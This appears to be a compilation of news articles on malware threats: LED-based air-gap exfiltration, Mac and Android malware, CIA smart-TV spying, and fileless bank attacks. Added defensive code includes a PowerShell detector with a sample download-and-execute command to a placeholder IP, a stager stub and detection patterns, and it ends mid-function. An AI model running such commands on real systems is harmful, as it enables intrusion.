
A FEW HOURS after dark one evening earlier this month, a small quadcopter drone lifted off from the parking lot of Ben-Gurion University in Beersheba, Israel. It soon trained its built-in camera on its target, a desktop computer’s tiny blinking light inside a third-floor office nearby. The pinpoint flickers, emitting from the LED hard drive indicator that lights up intermittently on practically every modern Windows machine, would hardly arouse the suspicions of anyone working in the office after hours. But in fact, that LED was silently winking out an optical stream of the computer’s secrets to the camera floating outside.

That data-stealing drone, shown in the video below, works as a Mr. Robot-style demonstration of a very real espionage technique. A group of researchers at Ben-Gurion’s cybersecurity lab has devised a method to defeat the security protection known as an “air gap,” the safeguard of separating highly sensitive computer systems from the internet to quarantine them from hackers. If an attacker can plant malware on one of those systems—say, by paying an insider to infect it via USB or SD card—this approach offers a new way to rapidly pull secrets out of that isolated machine. Every blink of its hard drive LED indicator can spill sensitive information to any spy with a line of sight to the target computer, whether from a drone outside the window or a telescopic lens from the next roof over.

[Video: https://www.youtube.com/watch?v=4vIu8ld68fc]

“If an attacker has a foothold in your air-gapped system, the malware still can send the data out to the attacker,” says Ben-Gurion researcher Mordechai Guri, who has spent years focusing on finding techniques for ferreting data out of isolated computer systems. “We found that the small hard drive indicator LED can be controlled at up to 6,000 blinks per second. We can transmit data in a very fast way at a very long distance.”

Gap Attack

An air gap, in computer security, is sometimes seen as an impenetrable defense. Hackers can’t compromise a computer that’s not connected to the internet or to other internet-connected machines, the logic goes. But malware like Stuxnet and the Agent.btz worm that infected American military systems a decade ago have proven that air gaps can’t entirely keep motivated hackers out of ultra-secret systems: even isolated systems need code updates and new data, opening them to attackers with physical access. And once an air-gapped system is infected, researchers have demonstrated a grab bag of methods for extracting information from it despite its lack of an internet connection, from electromagnetic emanations to acoustic and heat signaling techniques, many of them developed by the same Ben-Gurion researchers who came up with the new LED-spying trick.

But exploiting the computer’s hard drive indicator LED has the potential to be a stealthier, higher-bandwidth, and longer-distance form of air-gap-hopping communications. By transmitting data from a computer’s hard drive LED in Morse-code-like patterns of on and off signals, the researchers found they could move data as fast as 4,000 bits a second, or close to a megabyte every half hour. That may not sound like much, but it’s fast enough to steal an encryption key in seconds. And the recipient could record those optical messages to decode them later; the malware could even replay its blinks on a loop, Guri says, to ensure that no part of the transmission goes unseen.

The technique also isn’t as limited in range as other clever systems that transmit electromagnetic signals or ultrasonic noises from speakers or a computer’s fans. And compared to other optical techniques that use the computer’s screen or keyboard light to secretly transmit information, the hard-drive LED indicator, which blinks any time a program accesses the hard drive, routinely flashes even when a computer is idle, so extra blinking draws no attention. Any malware that runs with the privileges of a normal user, rather than deeper administrative privileges, can manipulate it, because all it needs to do is read from the disk. The team used a Linux computer for their testing, but the effects should be the same on a Windows device.

“The LED is always blinking as it’s doing searching and indexing, so no one suspects, even in the night,” says Guri. “It’s very covert, actually.”

Slow and Steady

The researchers found that when their program read less than 4 kilobytes from the computer’s storage at a time, they could make the hard drive’s LED blink for less than a fifth of a millisecond. They then tried using those rapid-fire blinks to send messages from an “infected” computer to a variety of cameras and light sensors, using a binary encoding known as on-off keying (OOK), in which a lit LED represents a 1 and a dark LED a 0 during each symbol period. They found that a typical smartphone camera can receive at most around 60 bits per second because of its low frame rate, while a GoPro camera captured as much as 120 bits per second. A Siemens photodiode sensor was far better suited to their high-frequency light-sensing needs, though, and allowed them to hit their 4,000 bits per second maximum transmission rate.

The malware could also make the hard drive LED blink so briefly, in fact, that it would be undetectable to human eyes, yet still registered by the light sensor. That means an attacker could even send invisible light signals to a faraway spy, albeit at a slower rate to avoid its covert blinks blurring into a visible signal. “It’s possible for the attacker to do such fast blinking that a human never sees it,” says Guri.

The good news, however, for anyone security-sensitive enough to worry about the researchers’ attack (and anyone who air-gaps their computers may be just that sensitive) is that the Ben-Gurion researchers point to clear countermeasures against their hard drive LED exfiltration method. They suggest keeping air-gapped machines in secure rooms away from windows, or placing film over a building’s glass designed to mask light flashes. They also note that protective software on a target machine could randomly access the hard drive to create noise and jam any attempt to send a message from the computer’s LED.
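To make the numbers in the two sections above concrete (on-off keying over the LED, the frame-rate ceiling of the receiver, and the disk-noise jamming countermeasure), here is a small simulation. It is an added example written for this page, not code from the Ben-Gurion team; the sample rate, the message bytes and the jamming schedule are assumptions, and the camera and photodiode are modelled only as light integrators over one frame period.

```python
"""Simulate on-off keying (OOK) over a hard-drive LED, the frame-rate
ceiling of the receiver, and jamming by constant disk activity.
Added example; not the researchers' code. Time is modelled at
SAMPLE_RATE samples per second; a 1 means the LED is lit."""
from typing import List

SAMPLE_RATE = 48_000  # assumed simulation resolution (Hz)


def bytes_to_bits(data: bytes) -> List[int]:
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def bits_to_bytes(bits: List[int]) -> bytes:
    usable = len(bits) - len(bits) % 8
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))


def led_waveform(bits: List[int], bit_rate: int) -> List[int]:
    """OOK transmitter: hold the LED on for one symbol period per 1 bit and off
    per 0 bit (the malware does this by issuing, or not issuing, a small read)."""
    spb = SAMPLE_RATE // bit_rate  # samples per symbol
    return [bit for bit in bits for _ in range(spb)]


def capture(waveform: List[int], frame_rate: int) -> List[float]:
    """Receiver: a camera (or photodiode) integrates light over each frame
    period, giving the average LED state per frame."""
    flen = SAMPLE_RATE // frame_rate
    return [sum(waveform[i:i + flen]) / len(waveform[i:i + flen])
            for i in range(0, len(waveform), flen)]


def decode(frames: List[float], frame_rate: int, bit_rate: int, n_bits: int) -> List[int]:
    """Threshold the frame that starts each symbol period. When the frame rate
    is below the bit rate, many symbols land in one frame and are lost."""
    bits = []
    for i in range(n_bits):
        idx = (i * frame_rate) // bit_rate
        if idx >= len(frames):
            break
        bits.append(1 if frames[idx] > 0.5 else 0)
    return bits


def jam(waveform: List[int], interval: int, on_samples: int) -> List[int]:
    """Countermeasure: a defender process reads the disk every `interval`
    samples, lighting the LED for `on_samples` samples each time. The article
    suggests random reads; a fixed schedule is used here for reproducibility."""
    return [1 if (i % interval) < on_samples else s for i, s in enumerate(waveform)]


def exfil_roundtrip(secret: bytes, bit_rate: int, frame_rate: int, jammed: bool = False) -> bytes:
    """Full chain: encode -> blink -> (optional jamming) -> capture -> decode."""
    bits = bytes_to_bits(secret)
    wave = led_waveform(bits, bit_rate)
    if jammed:
        half = (SAMPLE_RATE // bit_rate) // 2
        wave = jam(wave, interval=half, on_samples=half * 2 // 3)  # LED lit 2/3 of the time
    return bits_to_bytes(decode(capture(wave, frame_rate), frame_rate, bit_rate, len(bits)))


if __name__ == "__main__":
    key = b"KEY"  # constructed stand-in for the secret being exfiltrated
    print("photodiode 16 kHz, 4000 bit/s:", exfil_roundtrip(key, 4000, 16000))
    print("camera 60 fps, 4000 bit/s:   ", exfil_roundtrip(key, 4000, 60))
    print("camera 60 fps, 30 bit/s:     ", exfil_roundtrip(key, 30, 60))
    print("jammed, photodiode 16 kHz:   ", exfil_roundtrip(key, 4000, 16000, jammed=True))
```

The decoder takes one frame per symbol, so the receiver's frame rate is the hard ceiling on the bit rate: a 60 fps camera recovers the key at 30 bit/s but turns a 4,000 bit/s stream into a single smeared frame, while a 16 kHz photodiode keeps up. The jamming function shows why constant disk activity on the defender's side works: once the LED is lit for most of every symbol period, the receiver reads a stream of ones no matter what the malware sends.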

But the simplest countermeasure by far is simply to cover the computer’s LED itself. Once, a piece of tape over a laptop’s webcam was a sign of paranoia. Soon, a piece of tape obscuring a computer’s hard drive LED may be the real hallmark of someone who imagines a spy drone at every window.

This article was published in wired.com by ANDY GREENBERG

Categorized in Internet Privacy

It used to be that Mac users didn’t really have to worry about malware. But we live in a brave new world with easy internet access and a bunch of jerks, so the good ‘ole days are over. A new strain of Mac malware uses a familiar method to gain entry to your computer, but it’s the way it takes over that makes it particularly nasty.

The initial malware package is delivered by a standard phishing attack. The hackers send an email saying that there are issues with your tax return, with details in an attached .zip file. When you try to open the .zip archive, the malware package instead installs a small executable named AppStore.

That program then runs every time you boot the computer up, until the full malware package has been installed. Once that happens, users will see a fake macOS update page which looks decently close to the real thing. The “update” page sits on top of every other window, and prevents you from using your computer until you hit update.

Once you hit update, you’re prompted to enter your password. That’s where the really nasty stuff starts. Using the administrator privileges just granted, the malware installs Tor, adds a certificate that your system will trust, and changes the proxy settings so that all your web traffic is routed through an attacker-controlled proxy server.

With all that established, the attacker can see and modify all your web browsing, including traffic over HTTPS connections that would normally be protected, because the browser now trusts the attacker’s certificate. With that kind of access and a little time, the attacker can steal most people’s login details for every site, online banking credentials, and anything else you can think of.
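The proxy change is the part of this attack that outlives the phishing email, and it is visible in the system’s proxy configuration. The check below is an added example for this page (not from the article, from Check Point, or from the malware itself): it parses the output of macOS’s `scutil --proxy` and flags a proxy auto-config (PAC) URL or an explicit HTTP, HTTPS or SOCKS proxy pointing at a host the administrator has not allow-listed. Both sample outputs are constructed; the PAC address in the “infected” sample is an assumption, not a published indicator.

```python
"""Flag macOS system proxy settings of the kind a phishing-installed
interception proxy leaves behind. Added example; not from the article
or from Check Point. The samples are constructed, not captured."""
import re
import shutil
import subprocess
from typing import Dict, List, Optional, Sequence

# Constructed `scutil --proxy` output after a hypothetical infection.
# The PAC URL is an assumption for the example, not a real indicator.
SAMPLE_INFECTED = """<dictionary> {
  ExceptionsList : <array> {
    0 : *.local
    1 : 169.254/16
  }
  FTPPassive : 1
  HTTPEnable : 0
  HTTPSEnable : 0
  ProxyAutoConfigEnable : 1
  ProxyAutoConfigURLString : http://127.0.0.1:5555/proxy.pac
}
"""

# Constructed output for an untouched machine.
SAMPLE_CLEAN = """<dictionary> {
  ExceptionsList : <array> {
    0 : *.local
    1 : 169.254/16
  }
  FTPPassive : 1
  HTTPEnable : 0
  HTTPSEnable : 0
  ProxyAutoConfigEnable : 0
}
"""

KEY_RE = re.compile(r"^\s*([A-Za-z]+)\s*:\s*(.+?)\s*$")


def parse_scutil_proxy(text: str) -> Dict[str, str]:
    """Collect the top-level `key : value` pairs; nested arrays are skipped."""
    settings: Dict[str, str] = {}
    depth = 0
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.endswith("{"):
            depth += 1
            continue
        if stripped == "}":
            depth -= 1
            continue
        m = KEY_RE.match(line)
        if m and depth == 1:
            settings[m.group(1)] = m.group(2)
    return settings


def _host_of(url_or_host: str) -> str:
    return re.sub(r"^[a-z]+://", "", url_or_host).split("/")[0].split(":")[0]


def proxy_findings(settings: Dict[str, str], allowed_hosts: Sequence[str] = ()) -> List[str]:
    """Anything that redirects traffic to a host outside `allowed_hosts` is a finding."""
    findings: List[str] = []
    if settings.get("ProxyAutoConfigEnable") == "1":
        url = settings.get("ProxyAutoConfigURLString", "")
        if _host_of(url) not in allowed_hosts:
            findings.append(f"PAC enabled with unexpected URL: {url}")
    for scheme in ("HTTP", "HTTPS", "SOCKS"):
        if settings.get(f"{scheme}Enable") == "1":
            host = settings.get(f"{scheme}Proxy", "")
            if host not in allowed_hosts:
                port = settings.get(f"{scheme}Port", "")
                findings.append(f"{scheme} proxy enabled to unexpected host: {host}:{port}")
    return findings


def check_live(allowed_hosts: Sequence[str] = ()) -> Optional[List[str]]:
    """Inspect the running system; returns None when `scutil` is not available."""
    if shutil.which("scutil") is None:
        return None
    out = subprocess.run(["scutil", "--proxy"], capture_output=True, text=True, check=True).stdout
    return proxy_findings(parse_scutil_proxy(out), allowed_hosts)


if __name__ == "__main__":
    print("sample infected:", proxy_findings(parse_scutil_proxy(SAMPLE_INFECTED)))
    print("sample clean:   ", proxy_findings(parse_scutil_proxy(SAMPLE_CLEAN)))
    print("this machine:   ", check_live())
```

Run `check_live()` on a Mac to inspect the live configuration, passing any legitimate corporate proxy hosts as `allowed_hosts`. Because the interception also depends on a root certificate the user was tricked into trusting, pair this with a review of the admin trust settings (`security dump-trust-settings -d`) and remove any root you did not install.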

As per usual, the best defence isn’t antivirus software: it’s strong account security and a healthy skepticism of any email attachments. Not opening attachments unless they’re from a well-trusted source is a good start; using two-factor authentication on all your accounts, particularly important emails and online banking, will mitigate the potential damage from a hack.

This article was published on bgr.com by Chris Mills

Categorized in Internet Privacy
Another week, another Android malware.

Android malware often takes the form of infected apps on the Google Play Store, and a new variant called FalseGuide has been discovered by security company Check Point.

While Google has been pushing monthly security updates, manufacturers like Samsung unfortunately often delay pushing these updates to customers. The result? According to Google, half of Android devices did not receive security updates in 2016. That’s particularly problematic when malware like FalseGuide shows up, as it gives that malware an opportunity to take advantage of more unprotected phones.

“FalseGuide creates a silent botnet out of the infected devices for adware purposes. A botnet is a group of devices controlled by hackers without the knowledge of their owners,” says Check Point in a blog post. “The bots are used for various reasons based on the distributed computing capabilities of all the devices.”

Issues arise once the apps are installed: they request device administrator permissions, which can then be used against the owner of the phone. For now, it appears those permissions allow the app to deliver “illegitimate pop-up ads out of context,” but they could also be used to launch DDoS attacks.

The malware was first discovered a few days ago, and appeared in a hefty 44 game guide apps. Those apps were since removed, but another five apps with the malicious code were then discovered. Scarily enough, some of these apps were uploaded as early as November 2016 — so they stayed on the Google Play Store for around 5 months before being taken down. As far as users impacted by the malware, Check Point estimates between 500,000 to 1.8 million users. Thankfully, of the 49 infected apps, 28 of them were downloaded less than 10 times and seven of them were apparently never downloaded.

It’s unlikely the Google Play Store will ever be totally safe — but it is the safest place to download Android apps. For now, it’s important to download only official apps, and stick with the ones that you trust.

This article was published on Digital Trends by Christian de Looper

Categorized in Internet Privacy

People love using macOS for plenty of reasons: its simple navigability, its built-in suite of creative-minded tools, and y'know, the whole Apple fanboy thing. But the OS's perceived security remains one of the biggest draws for picking a Mac over a Windows device.

That security, however, may be at risk. McAfee Labs' latest Threats Report, published at the beginning of the month, shared some potentially sobering news for Mac users: There's been a massive spike in new malware targeting macOS, resulting in a more than 700 percent increase in the malicious software from just the year before. The influx came during Q4 2016, the last quarter for which data has been gathered.


McAfee recorded nearly 350,000 new malicious samples on macOS, and more than 460,000 reports of malware affecting macOS overall, during the quarter. That's roughly a sevenfold increase from Q3 2016, which posted barely 50,000 new samples. The year before had even fewer instances of the nasty software, as Q4 2015 barely registered any new reports.

The increase in malware comes as more people buy Apple's computers and use its OS, as Fortune notes. 

There is a bright side, though: McAfee says that the majority of the malware came from adware bundling, which looks to deluge your web browsing experience with popup ads. It's annoying, sure, but it's preferable to truly malicious software that aims to take over your laptop or knock your computer out of commission.


Source : mashable.com

Categorized in Internet Privacy

Your smartphone is surprisingly vulnerable to viruses and malware. But you can protect yourself.

BARCELONA — The smartphone industry has given birth to a vibrant growth sector distinguished by its creativity, drive and entrepreneurship. Unfortunately, that sector is malware.

Conversations with security professionals here at Mobile World Congress, the world’s largest mobile tech show, provided a dismaying, but necessary, reminder that the computers in our pockets are targets for authors of malware and other scams — and that many of us don’t care about those risks.

“The amount of thought that consumers are giving to security is almost nonexistent,” said Gary Davis, chief consumer security evangelist at Intel (INTC).

App anxiety

The major malware risk on smartphones remains downloading a hostile app that tries to compromise your data or run up your phone bill. The best advice for avoiding such threats is to stick to the Google (GOOG, GOOGL) Play Store instead of downloading apps from third-party stores or off the Web.

The fact that Google screens its Play Store apps makes the risk of malware there “dramatically less than a third-party app store, by far,” said Davis. Still, the Play Store isn’t immune from crooks.

Last month, for instance, the Slovakian security firm ESET found a trojan app on the Play Store disguised as a world weather app. Google yanked the app after ESET notified the company.

“We encounter these things … I would say every couple of months,” said ESET chief technical officer Juraj Malcho. The risk of downloading malware on iOS is vanishingly small in comparison to Android, thanks in part to the strict limits Apple (AAPL) places on how apps interact with the operating system.

A recent report by Intel’s McAfee subsidiary noted a related issue: Many customers still have copies of apps on their devices that have long since been removed from the Play Store. The report urged more notification and disclosure when apps are taken out of the marketplace.

Read the reviews, please

But many users may ignore those alerts if an app looks legit. The McAfee report noted an example of a photo app that silently signed users up for premium text messaging services — and yet still earned a 3.5 out of 5 rating on the Play Store.

ESET’s Malcho said he wished people would look past apps’ ratings and instead check users’ comments. “Many times, we encounter clear reviews in the text, ‘Don’t install this,’ ‘this is bloody malware,’ and people install it anyway.”

Some of the countries represented at MWC don’t have access to the Play Store, because their governments block Google. That leaves those users subject to whatever defenses their local app store alternatives offer.

Niloofar Amini, business developer at Tehran-based Cafe Bazaar, said his Iranian firm has a dedicated review team to assess and re-assess apps. Of course, the company also has to ensure that titles comply with the Islamic Republic’s morality laws and limits on political speech.

If you’re in China? Good luck. Intel’s Davis described app stores there as “just riddled” with malware.

Good and bad news on phones

The show floor provides one reason for optimism about the state of Android security: fingerprint sensors. When even cheap, unlocked phones like the $229 Moto G5 Plus can be unlocked with a fingerprint sensor, we should begin to see more people securing their phones.

Today, a disturbingly high number — 28 percent of Americans, according to a Pew Research Center study released in January — don’t lock their phones at all. Without that, a stolen phone can easily be wiped and resold … after the thief abuses all the personal data on it.

“Let’s stop calling it a phone,” said Raj Samani, Intel Security’s chief technical officer for Europe, the Middle East and Africa. “It’s not even a computing device — it is our digital passport.”

Unfortunately, most of the devices on the floor don’t run the latest version of Android, which can leave them open to security holes. Demo units of Samsung’s new Tab S3 tablet, LG’s G6, Moto’s G5 Plus and HTC’s (headphone jack-deprived) U Ultra all ran Google’s Android 7.0, which shipped in August, not its subsequent updates.

The new Nokia 5 was a refreshing exception, showing the current 7.1.1 release and security patches current through March 1 — but that phone hasn’t been announced for the U.S. market yet.

Meanwhile, the majority of Android phones run older versions that lack the stronger security of 7.0, and the stricter control of apps added in 2015’s Android 6.0. Intel’s Samani called those “brownfield” devices, after the term developers use for environmentally contaminated sites that they sometimes must build on.

ESET’s Malcho mused out loud about a more extreme fix for that brownfield-phone problem: “Make the device so it dies in two years.”

Source : Yahoo.com

Categorized in Internet Privacy

Master cyber criminals, super-trojans, workforce shifts, advanced analytics and more – CBR talks to the experts about how 2017 could prove an even bigger, smarter year for artificial intelligence.

AI certainly arrived with aplomb in 2016, with chatbots, digital assistants, Pokémon Go, Watson and DeepMind just some of the AI companies and tech bringing artificial intelligence to the masses. The opportunities, benefits and promise of the technology, so experts say, are vast, limitless even, so what can we expect in the coming year? CBR talked to the top AI experts about their artificial intelligence predictions for the new year, with 2017 already shaping up to be even smarter than 2016.

Artificial Intelligence Predictions for 2017:

The Year of the digital Moriarty

Ian Hughes Analyst, Internet of Things, 451 Research

“With so much data flowing from the interconnected world of IoT, higher end AI is being used to find security holes and anomalies in systems that are too complex for humans to control. Security breaches we have seen so far have been brute force ones, the equivalent of a digital crow bar.

“AI being used to protect is clearly a benefit, but this technology is increasingly available to anyone, replacing the digital crow bar with a virtual master criminal, 2017 might just see Holmes versus Moriarty digital intellects start to battle it out behind the scenes.”


Artificial Intelligence Predictions for 2017:

The Year Machines Steal more human jobs than ever before

Dik Vos, CEO at SQS

“We will continue to see a rise in digital technology over the coming years, and 2017 will be the year we see the likes of Artificial Intelligence (AI) and automated vehicles take the place of low-skilled workers.

With machines pushing humans out of a number of jobs including, logistics drivers and factory workers, I predict we will see an increased emphasis placed on the retraining of up to 30 per cent of our working population. People want and need to work and 2017 will see those workers who have lost their jobs through digitalisation, start to filter across a variety of other sectors including manufacturing and labour.”

Artificial Intelligence Predictions for 2017:

The Year of the Buzzword Mart

Hal Lonas, CTO at Webroot

“In 2017 we will see an explosion of companies shopping at Buzzword Mart. The growing attention paid to terminology like Artificial Intelligence and Machine Learning will lead to more firms incorporating “me too” marketing claims into their messaging. Prospective buyers should take these claims with a grain of salt and carefully check the pedigree and experience of firms claiming to use these advanced approaches. Buyers are rightfully confused, and it is difficult to compare, prove, or disprove efficacy in an ecosystem where market messaging is dominated by legacy or unicorn-funded voices. All too often we see legacy technology bolting barely-functional technology onto bloated and ill-architected heavy-weight solutions, leading to a poor end product whose flaws can range from bad user experience to security vulnerabilities.

“This rings especially true for security, where the distinction between legitimate machine learning trained threat intelligence and a second-rate snap-on solution can be the difference between leaking critical customer or IP data files, or blocking the threat before it reaches the network.”

Artificial Intelligence Predictions for 2017:

The Year of AI-as-a-service

Abdul Razack, SVP & Head of Platforms, Big Data and Analytics, Infosys

“AI-as-a-Service will take off: In 2016 AI was applied to solve known problems. As we move forward we will start leveraging AI to gain greater insights into ongoing problems that we didn’t even know existed. Using AI to uncover these “unknown unknowns” will free us to collaborate more and tackle new, interesting and life-changing challenges.”

Artificial Intelligence Predictions for 2017:

The Year CIOs Take the AI Helm

Graeme Thompson, SVP and CIO, Informatica

“With the accelerating pace of business, organisations need to deliver change and make decisions at a rate unheard of just a few years ago. This has made human-paced processing insufficient in the face of the petabytes and exabytes of data that are pouring into the enterprise, driving a rise in machine learning and AI.

“Whereas before, machines would be used to complete a few tasks within a workflow, now they are executing almost the entire process, with humans only required to fill in the gaps.

“Rewind 20 years and we used tools like MapQuest to figure out the shortest distance between two points, but we never would have trusted it to tell us where to go. Now, with new developments like Waze, many of us delegate the navigation of a journey entirely to a machine.


“Before long, humans will no longer be needed to fill the gaps. We’ll find that machines are fully autonomous in the case of driverless cars, for example, because they can store and make sense of much more information than humans can process. However, organisations capitalising on the benefits of AI and machine learning will have to ensure data quality to guarantee the accuracy of these fast responses. Un-validated or inaccurate data in a machine learning algorithm causes misleading insights or inaccurate actions when automated.

“In 2017, CIOs will be tasked with taking the helm of data driven initiatives and ensuring that data is clean enough to be processed by machines to drive fast and accurate insight and action.”

Author : ELLIE BURNS

Source : http://www.cbronline.com/news/internet-of-things/smart-technology/artificial-intelligence-predictions-2017-expect-ai-service-smart-malware-digital-moriarty/#

Categorized in Science & Tech

Keeping malware off of your mobile device should be a top priority for anyone who purchases a new smartphone or tablet, but what if the battle against bad actors has been lost before you even open the box? That’s exactly what security firm Check Point says is happening right now, and it just released a report claiming that it detected malware on 36 different Android devices being used by multiple large tech companies.

The devices on which the malicious code was detected are thought to have been compromised at some point between manufacturing and eventual sale to the end user. “The malicious apps were not part of the official ROM supplied by the vendor,” Check Point’s Mobile Threat Prevention team explains in a blog post, adding that the malware must have been added “somewhere along the supply chain.”

In Check Point’s investigation, the devices that were shown to have preinstalled malware come from many different manufacturers. They include: Galaxy Note 2, 3, 4, 5, and 8, Asus Zenfone 2, LG G4, Nexus 5 and 5X, and Xiaomi Mi 4i and Redmi.

For better or worse, the malware found to be installed on the devices is fairly well known in mobile security circles and includes Loki, a malicious advertising bot, and Slocker, which uses the Tor network to send data back to its creator while avoiding detection. This is obviously a very serious situation, and it’s certainly not the first time Android devices were found to have security issues right out of the box. Check Point hasn’t revealed what company the devices belonged to, but that might not actually matter in the grand scheme of things, as it appears preinstalled malware is becoming something of a trend on Google’s mobile OS.


See the original version of this article on BGR.com

Source : https://www.yahoo.com/tech/38-popular-android-devices-ship-malware-already-installed-010213452.html

Categorized in Internet Privacy

The malware, developed during a hackathon between British and American spies, turns ordinary smart TVs into listening devices.

Buried in a trove of classified and secret CIA documents leaked earlier on Tuesday are files that show British and American spies worked closely together to hack into smart TVs.

The documents, which can't be independently verified, are part of a trove of files provided by WikiLeaks, which dropped thousands of documents said to be from the CIA's elite hacking unit, dubbed the Center for Cyber Intelligence.

Although the CIA has yet to comment, former NSA contractor turned whistleblower Edward Snowden said that the cache "looks authentic," because program and office descriptions named in the documents could only be known by a "cleared insider."

One such program, dubbed "Weeping Angel," allowed spies to turn a regular Samsung smart TV into a listening device.

The "secret" classified program, developed during a hackathon between spies at the CIA and British domestic security service MI5 in mid-2014, is said to act like a regular smart TV app, but it can record audio from its surrounding areas, such as a living room or a busy office.

According to Shodan, the search engine for internet-connected devices, there are at least 11,300 Samsung smart TVs connected to the internet.

In case you didn't know, many Samsung and other smart TVs come with an embedded microphone and camera to power their voice-recognition systems and other features.

A review of a number of documents shows how crafty the malware is: one file says the malware can suppress the TV's power functionality to make it look as though the smart TV is turned off.

The so-called "Fake-Off" mode would trigger when the user uses the remote control to turn the TV off, because the malware "already hooks key presses from the remote (or TV goes to sleep) to cause the system to enter Fake-Off rather than Off," said one document.

The malware also suppresses the TV's power light to make it look as though the TV was powered down, but it allowed spies to keep recording.

According to another document, the malware can also extract Wi-Fi passwords and install a root certificate to carry out man-in-the-middle attacks.

That could allow further exploitation of the network that the smart TV is connected to.

A future version of the malware appears to look into recording images and video from the smart TV (if it comes with an embedded camera) as well as live streaming of audio.

It's not the first time smart TVs have been targeted for surveillance.

Samsung's smart TVs were known to be streaming back continuous recordings as early as 2015 after security researchers found the devices were transmitting outbound data. Samsung since updated its privacy policy to warn that personal and other sensitive information can be picked up by the TV's microphone.

Kenneth White, a security researcher and cryptographer, told The Intercept that smart TVs are a "historically pretty easy target," and that there is "zero chance" that the CIA targeted only Samsung.

Author : Zack Whittaker

Source : http://www.zdnet.com/article/how-cia-mi5-hacked-your-smart-tv-to-spy-on-you/

Categorized in Internet Privacy
Banks around the world have been the target of malware attacks for quite some time now. Criminals continue to step up their game in this department, as fileless malware is becoming a lot more mainstream of late. That is a troublesome development, to say the least, because attacks of this kind leave little for conventional file-scanning defenses to detect.

FILELESS MALWARE BECOMES THE NEW TREND

When one thinks of malware, one often assumes the payload is distributed through a malicious file. In most cases, criminals spread malware through infected email attachments, which has proven to be quite a successful method of attack so far. Despite these initial successes, it remains important for online criminals to come up with new methods to wreak havoc using malware.

Two years ago, researchers came across a peculiar type of malware infection that raised a lot of questions. Kaspersky Lab had their network infected with an unknown type of malware. It was unclear how this infection was even possible, considering there were no malicious files found anywhere on the system. As it turns out, Kaspersky Lab was hit by a fileless malware, as all of its components resided in the memory of the compromised computers. This allowed the infection to remain undetected for quite some time.

Fast forward to today and it appears fileless malware attacks are becoming far more common than anticipated. New research published by Kaspersky Lab shows at least 140 banks and other enterprises across 40 different countries have been affected by fileless malware during recent campaigns. Every single attack against these institutions relies on malware that lives only in the physical memory of infected systems, leaving nothing on disk for file-based scanners to find and little forensic evidence once a machine is rebooted. Dealing with malicious software that leaves no file behind is a very troublesome development for security researchers.

To make matters worse, this fileless malware is loaded into memory with widely available tools rather than custom code: PowerShell scripts and in-memory payloads from the Metasploit framework are the two primary delivery methods for the time being. Unfortunately, banks are not adequately prepared for this method of attack, which is exactly why criminals are going after financial institutions in the first place. The bigger question is what can be done to nip this attack in the bud, and that remains somewhat unclear at this stage.


One silver lining in all of this is that the Kaspersky Lab researchers obtained an intact sample of the fileless malware while it was residing in an infected computer’s physical memory. After analyzing this sample, it became clear this fileless malware was used to harvest the passwords of system administrators and of engineers who have remote administration access to network-connected machines.

For the time being, security researchers remain uncertain as to how the malware takes hold in the first place. Remote injection attacks or exploits targeting popular online content management applications is one potential attack vector. More information regarding fileless malware will be provided in the coming months, as it will take quite some time to analyze this new threat.
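Because nothing is written to disk, the place to look for this kind of intrusion is the command lines and script blocks of the tools that load the payload into memory. The triage script below is an added example for this page (not from Kaspersky Lab or the article): it decodes PowerShell `-EncodedCommand` arguments and scores each command line against indicators typical of Metasploit-style in-memory injection and download-and-execute stagers. The command lines and the stager are constructed for the example, the weights are a judgement call, and a real deployment would read command lines from process-creation or PowerShell script-block logs rather than from a list.

```python
"""Triage PowerShell command lines for in-memory payload patterns.
Added example; not from Kaspersky Lab or the article. All sample
command lines below are constructed, not real telemetry."""
import base64
import re
from typing import Dict, List, Optional

# Stand-in for a Metasploit-style PowerShell stager: declares VirtualAlloc via
# P/Invoke and decodes a base64 blob (here four NOP bytes, not real shellcode).
STAGER = (
    "$k = Add-Type -MemberDefinition '[DllImport(\"kernel32.dll\")] public static extern "
    "IntPtr VirtualAlloc(IntPtr a, uint b, uint c, uint d);' -Name W -PassThru; "
    "$s = [Convert]::FromBase64String('kJCQkA=='); "
    "$p = $k::VirtualAlloc(0, $s.Length, 0x3000, 0x40)"
)
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode()

SAMPLE_COMMANDS = [  # constructed; 198.51.100.0/24 is a documentation range
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand " + ENCODED_STAGER,
    'powershell.exe -c "Get-ChildItem C:\\Users"',
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.7/a')\"",
    "C:\\Windows\\System32\\notepad.exe",
]

# (regex, description, weight), matched against the command line plus any
# decoded -EncodedCommand payload. Weights are a judgement call.
INDICATORS = [
    (r"\bIEX\b|Invoke-Expression", "dynamic code evaluation", 2),
    (r"DownloadString|DownloadFile|Net\.WebClient", "payload fetched from the network", 2),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 1),
    (r"-nop\b|-noprofile", "profile suppressed", 1),
    (r"-e(?:p|xec|xecutionpolicy)\s+bypass", "execution policy bypass", 1),
    (r"VirtualAlloc|CreateThread|WriteProcessMemory|memset", "Win32 memory APIs from script", 3),
    (r"\[Reflection\.Assembly\]::Load|Invoke-ReflectivePEInjection|Invoke-Mimikatz",
     "reflective in-memory loading", 3),
    (r"FromBase64String", "embedded base64 blob", 1),
]
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell's -EncodedCommand argument is base64 of UTF-16LE text."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str, threshold: int = 3) -> Dict:
    """Score one command line; `flagged` means it deserves a human look."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    reasons: List[str] = []
    score = 0
    if decoded:
        reasons.append("encoded command")
        score += 1
    for pattern, desc, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            reasons.append(desc)
            score += weight
    return {"score": score, "flagged": score >= threshold, "reasons": reasons, "decoded": decoded}


def triage(cmdlines: List[str], threshold: int = 3) -> List[int]:
    """Indexes of the command lines that crossed the threshold."""
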